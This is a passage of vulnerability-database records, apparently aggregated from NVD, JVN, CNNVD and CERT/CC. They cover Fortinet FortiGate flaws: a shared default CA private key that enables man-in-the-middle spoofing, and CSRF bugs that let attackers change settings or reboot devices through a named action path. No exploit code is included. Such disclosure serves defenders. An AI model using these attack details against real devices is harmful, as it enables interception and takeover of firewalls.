"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201307-116"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Fortinet FortiGate Runs on the device FortiOS Vulnerable to cross-site request forgery",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-003232"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "cross-site request forgery",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201307-116"
}
],
"trust": 0.6
}
}
var-201211-0266
Vulnerability from variot
The default configuration of Fortinet Fortigate UTM appliances uses the same Certification Authority certificate and same private key across different customers' installations, which makes it easier for man-in-the-middle attackers to spoof SSL servers by leveraging the presence of the Fortinet_CA_SSLProxy certificate in a list of trusted root certification authorities. The private key, which has been compromised, allows attackers to create and sign fake certificates. FortiGate of UTM The appliance includes CA There is a problem with the handling of the certificate. FortiGate of UTM The appliance is common by default CA It uses a certificate and its private key is publicly available on the web. Therefore, this CA All devices that use certificates may be affected by this vulnerability.Man-in-the-middle attacks by third parties (man-in-the-middle attack) May be eavesdropped on, or malware may be installed. Fortigate UTM appliances is prone to a security-bypass vulnerability. Successfully exploiting this issue allows attackers to perform man-in-the-middle attacks and gain access to sensitive information; other attacks are also possible. Fortinet FortiGate is a network security platform developed by Fortinet. The platform provides functions such as firewall, antivirus and intrusion prevention (IPS), application control, antispam, wireless controller and WAN acceleration
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201211-0266",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "fortigate-310b",
"scope": "eq",
"trust": 1.6,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-50b",
"scope": "eq",
"trust": 1.6,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-200b",
"scope": "eq",
"trust": 1.6,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-3140b",
"scope": "eq",
"trust": 1.6,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-5140b",
"scope": "eq",
"trust": 1.6,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-3950b",
"scope": "eq",
"trust": 1.6,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-1000c",
"scope": "eq",
"trust": 1.6,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-3040b",
"scope": "eq",
"trust": 1.6,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-5020",
"scope": "eq",
"trust": 1.6,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-5060",
"scope": "eq",
"trust": 1.6,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-20c",
"scope": "eq",
"trust": 1.0,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-3810a",
"scope": "eq",
"trust": 1.0,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-5001a-sw",
"scope": "eq",
"trust": 1.0,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-600c",
"scope": "eq",
"trust": 1.0,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-5001b",
"scope": "eq",
"trust": 1.0,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-80c",
"scope": "eq",
"trust": 1.0,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-300c",
"scope": "eq",
"trust": 1.0,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-60c",
"scope": "eq",
"trust": 1.0,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-voice-80c",
"scope": "eq",
"trust": 1.0,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-800c",
"scope": "eq",
"trust": 1.0,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-110c",
"scope": "eq",
"trust": 1.0,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-620b",
"scope": "eq",
"trust": 1.0,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-40c",
"scope": "eq",
"trust": 1.0,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-3240c",
"scope": "eq",
"trust": 1.0,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-5101c",
"scope": "eq",
"trust": 1.0,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigaterugged-100c",
"scope": "eq",
"trust": 1.0,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-100d",
"scope": "eq",
"trust": 1.0,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-1240b",
"scope": "eq",
"trust": 1.0,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-311b",
"scope": "eq",
"trust": 1.0,
"vendor": "fortinet",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate",
"scope": "eq",
"trust": 0.8,
"vendor": "fortinet",
"version": "utm the appliance"
},
{
"model": "unified threat management",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "0"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#111708"
},
{
"db": "BID",
"id": "56382"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-005202"
},
{
"db": "CNNVD",
"id": "CNNVD-201211-077"
},
{
"db": "NVD",
"id": "CVE-2012-4948"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/h:fortinet:fortigate",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2012-005202"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Bitwiper",
"sources": [
{
"db": "BID",
"id": "56382"
},
{
"db": "CNNVD",
"id": "CNNVD-201211-077"
}
],
"trust": 0.9
},
"cve": "CVE-2012-4948",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "HIGH",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 3.2,
"id": "CVE-2012-4948",
"impactScore": 7.8,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:A/AC:H/Au:N/C:C/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "HIGH",
"accessVector": "ADJACENT NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"availabilityRequirement": "NOT DEFINED",
"baseScore": 4.6,
"collateralDamagePotential": "NOT DEFINED",
"confidentialityImpact": "COMPLETE",
"confidentialityRequirement": "NOT DEFINED",
"enviromentalScore": 3.7,
"exploitability": "FUNCTIONAL",
"exploitabilityScore": 3.2,
"id": "CVE-2012-4948",
"impactScore": 6.9,
"integrityImpact": "NONE",
"integrityRequirement": "NOT DEFINED",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"remediationLevel": "WORKAROUND",
"reportConfidence": "UNCOFIRMED",
"severity": "MEDIUM",
"targetDistribution": "NOT DEFINED",
"trust": 0.8,
"userInteractionRequired": null,
"vector_string": "AV:A/AC:H/Au:N/C:C/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "HIGH",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 3.2,
"id": "VHN-58229",
"impactScore": 7.8,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:A/AC:H/AU:N/C:C/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2012-4948",
"trust": 1.6,
"value": "MEDIUM"
},
{
"author": "nvd@nist.gov",
"id": "CVE-2012-4948",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201211-077",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-58229",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#111708"
},
{
"db": "VULHUB",
"id": "VHN-58229"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-005202"
},
{
"db": "CNNVD",
"id": "CNNVD-201211-077"
},
{
"db": "NVD",
"id": "CVE-2012-4948"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The default configuration of Fortinet Fortigate UTM appliances uses the same Certification Authority certificate and same private key across different customers\u0027 installations, which makes it easier for man-in-the-middle attackers to spoof SSL servers by leveraging the presence of the Fortinet_CA_SSLProxy certificate in a list of trusted root certification authorities. The private key, which has been compromised, allows attackers to create and sign fake certificates. FortiGate of UTM The appliance includes CA There is a problem with the handling of the certificate. FortiGate of UTM The appliance is common by default CA It uses a certificate and its private key is publicly available on the web. Therefore, this CA All devices that use certificates may be affected by this vulnerability.Man-in-the-middle attacks by third parties (man-in-the-middle attack) May be eavesdropped on, or malware may be installed. Fortigate UTM appliances is prone to a security-bypass vulnerability. \nSuccessfully exploiting this issue allows attackers to perform man-in-the-middle attacks and gain access to sensitive information; other attacks are also possible. Fortinet FortiGate is a network security platform developed by Fortinet. The platform provides functions such as firewall, antivirus and intrusion prevention (IPS), application control, antispam, wireless controller and WAN acceleration",
"sources": [
{
"db": "NVD",
"id": "CVE-2012-4948"
},
{
"db": "CERT/CC",
"id": "VU#111708"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-005202"
},
{
"db": "BID",
"id": "56382"
},
{
"db": "VULHUB",
"id": "VHN-58229"
}
],
"trust": 2.7
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.kb.cert.org/vuls/id/111708",
"trust": 0.8,
"type": "unknown"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#111708"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2012-4948",
"trust": 3.6
},
{
"db": "CERT/CC",
"id": "VU#111708",
"trust": 3.3
},
{
"db": "BID",
"id": "56382",
"trust": 2.0
},
{
"db": "OSVDB",
"id": "87048",
"trust": 1.1
},
{
"db": "JVNDB",
"id": "JVNDB-2012-005202",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201211-077",
"trust": 0.7
},
{
"db": "VULHUB",
"id": "VHN-58229",
"trust": 0.1
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#111708"
},
{
"db": "VULHUB",
"id": "VHN-58229"
},
{
"db": "BID",
"id": "56382"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-005202"
},
{
"db": "CNNVD",
"id": "CNNVD-201211-077"
},
{
"db": "NVD",
"id": "CVE-2012-4948"
}
]
},
"id": "VAR-201211-0266",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-58229"
}
],
"trust": 0.01
},
"last_update_date": "2024-11-23T23:02:53.069000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Unified Threat Management (UTM)",
"trust": 0.8,
"url": "http://www.fortinet.com/solutions/unified_threat_management.html"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2012-005202"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-295",
"trust": 1.1
},
{
"problemtype": "CWE-16",
"trust": 0.8
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-58229"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-005202"
},
{
"db": "NVD",
"id": "CVE-2012-4948"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "http://www.kb.cert.org/vuls/id/111708"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/bid/56382"
},
{
"trust": 1.1,
"url": "http://osvdb.org/87048"
},
{
"trust": 0.8,
"url": "http://docs.fortinet.com/fos40hlp/43/wwhelp/wwhimpl/common/html/wwhelp.htm?context=fgt\u0026file=misc_utm_chapter.61.13.html"
},
{
"trust": 0.8,
"url": "http://kb.fortinet.com/kb/viewcontent.do?externalid=fd32404"
},
{
"trust": 0.8,
"url": "http://www.fortinet.com/solutions/unified_threat_management.html"
},
{
"trust": 0.8,
"url": "https://media.torproject.org/misc/2012-07-03-cyberoam-cve-2012-3372.txt"
},
{
"trust": 0.8,
"url": "http://docs.fortinet.com/fos40hlp/43/wwhelp/wwhimpl/js/html/wwhelp.htm"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-4948"
},
{
"trust": 0.8,
"url": "http://jvn.jp/cert/jvnvu111708"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2012-4948"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#111708"
},
{
"db": "VULHUB",
"id": "VHN-58229"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-005202"
},
{
"db": "CNNVD",
"id": "CNNVD-201211-077"
},
{
"db": "NVD",
"id": "CVE-2012-4948"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#111708"
},
{
"db": "VULHUB",
"id": "VHN-58229"
},
{
"db": "BID",
"id": "56382"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-005202"
},
{
"db": "CNNVD",
"id": "CNNVD-201211-077"
},
{
"db": "NVD",
"id": "CVE-2012-4948"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2012-11-02T00:00:00",
"db": "CERT/CC",
"id": "VU#111708"
},
{
"date": "2012-11-14T00:00:00",
"db": "VULHUB",
"id": "VHN-58229"
},
{
"date": "2012-11-02T00:00:00",
"db": "BID",
"id": "56382"
},
{
"date": "2012-11-06T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2012-005202"
},
{
"date": "2012-11-06T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201211-077"
},
{
"date": "2012-11-14T12:30:59.507000",
"db": "NVD",
"id": "CVE-2012-4948"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2012-11-02T00:00:00",
"db": "CERT/CC",
"id": "VU#111708"
},
{
"date": "2016-12-07T00:00:00",
"db": "VULHUB",
"id": "VHN-58229"
},
{
"date": "2012-11-02T00:00:00",
"db": "BID",
"id": "56382"
},
{
"date": "2012-11-16T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2012-005202"
},
{
"date": "2012-11-15T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201211-077"
},
{
"date": "2024-11-21T01:43:48.363000",
"db": "NVD",
"id": "CVE-2012-4948"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "specific network environment",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201211-077"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Fortigate UTM appliances share the same default CA certificate",
"sources": [
{
"db": "CERT/CC",
"id": "VU#111708"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "configuration error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201211-077"
}
],
"trust": 0.6
}
}
Vulnerability from fkie_nvd
Published
2013-07-08 17:55
Modified
2024-11-21 01:49
Severity ?
Summary
Multiple cross-site request forgery (CSRF) vulnerabilities in Fortinet FortiOS on FortiGate firewall devices before 4.3.13 and 5.x before 5.0.2 allow remote attackers to hijack the authentication of administrators for requests that modify (1) settings or (2) policies, or (3) restart the device via a rebootme action to system/maintenance/shutdown.
References
Impacted products
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:*",
"matchCriteriaId": "F4A9AD38-4005-4B33-AB47-5E81F9AB5E32",
"versionEndIncluding": "4.3.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:fortinet:fortios:4.3.10:*:*:*:*:*:*:*",
"matchCriteriaId": "B75D8F35-830C-498C-B658-AE89154BEB8C",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:fortinet:fortios:5.0:*:*:*:*:*:*:*",
"matchCriteriaId": "51B177A0-244F-4A76-8425-F75C1DA3CC1B",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:fortinet:fortios:5.0.1:*:*:*:*:*:*:*",
"matchCriteriaId": "0D8A5EC4-CE2C-4174-9F09-361B8D153AD9",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:fortinet:fortigate-1000c:-:*:*:*:*:*:*:*",
"matchCriteriaId": "E7EF5E98-4A7F-486E-A666-5CB2D6AE4B6F",
"vulnerable": true
},
{
"criteria": "cpe:2.3:h:fortinet:fortigate-100d:-:*:*:*:*:*:*:*",
"matchCriteriaId": "0D62FF7B-F07B-4B1A-BE3C-3269BB517B64",
"vulnerable": true
},
{
"criteria": "cpe:2.3:h:fortinet:fortigate-110c:-:*:*:*:*:*:*:*",
"matchCriteriaId": "9D25F582-60D5-4B99-BF5D-DF0F075AE824",
"vulnerable": true
},
{
"criteria": "cpe:2.3:h:fortinet:fortigate-1240b:-:*:*:*:*:*:*:*",
"matchCriteriaId": "8C1D6711-1D64-4BD3-9580-C332A52C169E",
"vulnerable": true
},
{
"criteria": "cpe:2.3:h:fortinet:fortigate-200b:-:*:*:*:*:*:*:*",
"matchCriteriaId": "09756E3C-7C02-4482-B2ED-2646CA127A7E",
"vulnerable": true
},
{
"criteria": "cpe:2.3:h:fortinet:fortigate-20c:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F864DACE-F574-47D3-9E6D-8E463DCC1CB7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:h:fortinet:fortigate-300c:-:*:*:*:*:*:*:*",
"matchCriteriaId": "18E0C2D6-A8B3-4CF0-86CD-45CEA5D9E4E5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:h:fortinet:fortigate-3040b:-:*:*:*:*:*:*:*",
"matchCriteriaId": "42813ADB-E285-4FF0-946C-3A09833D9520",
"vulnerable": true
},
{
"criteria": "cpe:2.3:h:fortinet:fortigate-310b:-:*:*:*:*:*:*:*",
"matchCriteriaId": "0B75EAF6-3E8C-40CC-92D1-6069123182AC",
"vulnerable": true
},
{
"criteria": "cpe:2.3:h:fortinet:fortigate-311b:-:*:*:*:*:*:*:*",
"matchCriteriaId": "0BB1DA95-78AD-442D-8251-3ACF49CA2329",
"vulnerable": true
},
{
"criteria": "cpe:2.3:h:fortinet:fortigate-3140b:-:*:*:*:*:*:*:*",
"matchCriteriaId": "5014850E-FE19-40E8-8FA9-0FC152167B58",
"vulnerable": true
},
{
"criteria": "cpe:2.3:h:fortinet:fortigate-3240c:-:*:*:*:*:*:*:*",
"matchCriteriaId": "89280DF2-D8C0-4FDE-A79A-92687445CB20",
"vulnerable": true
},
{
"criteria": "cpe:2.3:h:fortinet:fortigate-3810a:-:*:*:*:*:*:*:*",
"matchCriteriaId": "6CB41136-3EBB-45B5-A885-69EE822E9C5B",
"vulnerable": true
},
{
"criteria": "cpe:2.3:h:fortinet:fortigate-3950b:-:*:*:*:*:*:*:*",
"matchCriteriaId": "FB3B88B6-3B10-4CE8-A854-9621E0FB1B30",
"vulnerable": true
},
{
"criteria": "cpe:2.3:h:fortinet:fortigate-40c:-:*:*:*:*:*:*:*",
"matchCriteriaId": "5534A2C1-C352-49BD-B639-404FE61660E0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:h:fortinet:fortigate-5001a-sw:-:*:*:*:*:*:*:*",
"matchCriteriaId": "615D7EB5-CA3B-430D-A1CB-8F7F17BCF403",
"vulnerable": true
},
{
"criteria": "cpe:2.3:h:fortinet:fortigate-5001b:-:*:*:*:*:*:*:*",
"matchCriteriaId": "766FAC92-8E75-4347-9A76-DB372DA28715",
"vulnerable": true
},
{
"criteria": "cpe:2.3:h:fortinet:fortigate-5020:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F9320594-0B6C-44DB-9C58-7FCBBDDC3F3F",
"vulnerable": true
},
{
"criteria": "cpe:2.3:h:fortinet:fortigate-5060:-:*:*:*:*:*:*:*",
"matchCriteriaId": "9BD39F61-3779-44BE-B71D-0E587072D8CC",
"vulnerable": true
},
{
"criteria": "cpe:2.3:h:fortinet:fortigate-50b:-:*:*:*:*:*:*:*",
"matchCriteriaId": "CE424B2A-3299-496F-9778-04D0792BC0D5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:h:fortinet:fortigate-5101c:-:*:*:*:*:*:*:*",
"matchCriteriaId": "59C78680-88A9-4AB0-9FE9-333690A9B66A",
"vulnerable": true
},
{
"criteria": "cpe:2.3:h:fortinet:fortigate-5140b:-:*:*:*:*:*:*:*",
"matchCriteriaId": "7AA3538A-5B71-4939-8A2A-93678E6EB1D3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:h:fortinet:fortigate-600c:-:*:*:*:*:*:*:*",
"matchCriteriaId": "7A73FA2A-1852-4AE0-A892-9B0B06705324",
"vulnerable": true
},
{
"criteria": "cpe:2.3:h:fortinet:fortigate-60c:-:*:*:*:*:*:*:*",
"matchCriteriaId": "1F72F3FE-DC85-4605-B416-4FE31F90A06A",
"vulnerable": true
},
{
"criteria": "cpe:2.3:h:fortinet:fortigate-620b:-:*:*:*:*:*:*:*",
"matchCriteriaId": "9D4BC042-D692-477E-A790-7BECF4B210A6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:h:fortinet:fortigate-800c:-:*:*:*:*:*:*:*",
"matchCriteriaId": "6EB09BD9-6853-40D6-BDA7-749D87335E4F",
"vulnerable": true
},
{
"criteria": "cpe:2.3:h:fortinet:fortigate-80c:-:*:*:*:*:*:*:*",
"matchCriteriaId": "113E1146-572A-466A-AB34-145081F842B4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:h:fortinet:fortigate-voice-80c:-:*:*:*:*:*:*:*",
"matchCriteriaId": "BF418899-1667-4428-B8E8-E4E29D634DDC",
"vulnerable": true
},
{
"criteria": "cpe:2.3:h:fortinet:fortigaterugged-100c:-:*:*:*:*:*:*:*",
"matchCriteriaId": "9C24DF92-D24B-43D1-8623-17F3F90F29D0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Multiple cross-site request forgery (CSRF) vulnerabilities in Fortinet FortiOS on FortiGate firewall devices before 4.3.13 and 5.x before 5.0.2 allow remote attackers to hijack the authentication of administrators for requests that modify (1) settings or (2) policies, or (3) restart the device via a rebootme action to system/maintenance/shutdown."
},
{
"lang": "es",
"value": "M\u00faltiples vulnerabilidades de falsificaci\u00f3n de peticiones en sitios cruzados (CSRF) en Fortinet FortiOS en el dispositivo firewall FortiGate anteriores a v4.3.13 y v5.x anteriores a v5.0.2 permite a atacantes remotos secuestrar la autenticaci\u00f3n de administradores para peticiones que modifican (1) configuraci\u00f3n (2) pol\u00edticas o (3) reinicio de dispositivos a trav\u00e9s de una acci\u00f3n reinicio sobre system/maintenance/shutdown."
}
],
"id": "CVE-2013-1414",
"lastModified": "2024-11-21T01:49:32.010",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "HIGH",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5.1,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 4.9,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
]
},
"published": "2013-07-08T17:55:02.783",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Exploit"
],
"url": "http://www.exploit-db.com/exploits/26528/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit"
],
"url": "http://www.exploit-db.com/exploits/26528/"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-352"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2012-11-14 12:30
Modified
2024-11-21 01:43
Severity ?
Summary
